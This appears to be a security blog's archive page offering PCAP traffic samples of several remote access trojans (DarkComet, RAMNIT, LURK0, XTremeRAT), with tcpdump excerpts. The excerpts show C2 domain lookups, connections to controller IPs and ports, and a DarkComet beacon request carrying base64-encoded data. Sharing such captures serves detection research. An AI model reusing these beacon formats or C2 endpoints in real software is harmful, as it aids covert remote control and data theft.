Category Archives: RAT – Remote Access Trojan

Infamous DarkComet RAT Remote Access Trojan or Remote Administration Tool PCAP Traffic Sample

Download Darkcomet PCAP sample : darkcomet.pcap   DarkComet is a remote access Trojan (RAT) which was developed by Jean-Pierre Lesueur (known as DarkCoderSc), an independent programmer and computer security coder from France.[1] The developer does not call it a “remote administration Trojan,” but rather a “remote administration tool”. Although the RAT was developed back in… Read More »

Share Button

RAMNIT Malware RAT Remote Access Trojan Backdoor Traffic Sample Download PCAP

Download RAMNIT Pcap here : ramnit2 2011-07-29 23:09:45.901035 IP 172.29.0.116.1026 > 68.87.73.246.53: 10515+ A? star-trakers.com. (34) E..>*……….tDWI….5.*$.)…………star-trakers.com….. 2011-07-29 23:09:45.934019 IP 68.87.73.246.53 > 172.29.0.116.1026: 10515 1/0/0 A 207.223.0.140 (50) E@.N..@.9…DWI….t.5…:..)…………star-trakers.com………………… 2011-07-29 23:09:45.934377 IP 172.29.0.116.1489 > 207.223.0.140.443: Flags [S], seq 1010670280, win 64240, options [mss 1460,nop,nop,sackOK], length 0 E..0*.@…S(…t……..<=……p…,……….. 2011-07-29 23:09:48.934987 IP 172.29.0.116.1489 > 207.223.0.140.443: Flags [S], seq… Read More »

Share Button

LURK0 Remote Access Trojan Malware Traffic Sample Hard to Detect – port 9494

2012-10-07 02:59:50.712242 IP 172.16.253.132.1083 > 216.176.190.44.9494: Flags [P.], seq 1:152, ack 1, win 64240, length 151 E….|@….J…….,.;%…..Z…P…q…LURK0……..x.kf.e.apgpbpa0c..#…….. L.>…!`1..f.rF…….$..#…. ………..fHe(b(c.dH………l ..:..r..”…!..P ….v…V`z0d0`0…/.T…..g.) 2012-10-07 02:59:50.712552 IP 216.176.190.44.9494 > 172.16.253.132.1083: Flags [.], ack 152, win 64240, length 0 E..(0y………,….%..;Z…….P…………. 2012-10-07 02:59:51.262392 IP 216.176.190.44.9494 > 172.16.253.132.1083: Flags [P.], seq 1:23, ack 152, win 64240, length 22 E..>0z………,….%..;Z…….P…….LURK0……..x.c…… 2012-10-07 02:59:51.363241… Read More »

Share Button

Darkcomet RAT – Remote Access Trojan Variant GET /a.php?id=

E..0.;@………@.+..*.P..`$….p…………… 2013-02-03 22:49:45.139070 IP 64.235.43.131.80 > 172.16.253.130.1066: Flags [S.], seq 1557609149, ack 2358992933, win 64240, options [mss 1460], length 0 E..,[J……@.+……P.*\.:…`%`….T…….. 2013-02-03 22:49:45.139138 IP 172.16.253.130.1066 > 64.235.43.131.80: Flags [.], ack 1, win 64240, length 0 E..(. 64.235.43.131.80: Flags [P.], seq 1:73, ack 1, win 64240, length 72 E..p.=@….I….@.+..*.P..`%\.:.P…Q…GET /a.php?id=c2ViYWxpQGxpYmVyby5pdA== HTTP/1.1 Host: 64.235.43.131 2013-02-03 22:49:45.139579 IP… Read More »

Share Button

APT Like – XTremeRAT – Remote Access Trojan – Port 336 Traffic GET /1234567890.functions

………PV.z ……)..1…………………. 2013-02-03 19:10:21.612693 IP 172.16.253.131.53 > 8.8.8.8.53: 47611+ A? shittway.zapto.org. (36) E..@……………..5.5.,……………shittway.zapto.org….. 2013-02-03 19:10:21.612755 IP 172.16.253.131.53 > 4.2.2.2.53: 47611+ A? shittway.zapto.org. (36) E..@……………..5.5.,……………shittway.zapto.org….. 2013-02-03 19:10:21.708585 IP 172.16.253.131.1046 > 197.163.56.70.336: Flags [S], seq 2370154844, win 64240, options [mss 1460,nop,nop,sackOK], length 0 E..0..@…S,……8F…P.E.\….p…………… 2013-02-03 19:10:22.114884 IP 172.16.253.131.1046 > 197.163.56.70.336: Flags [.], ack 1045510444, win 64240, length… Read More »

Share Button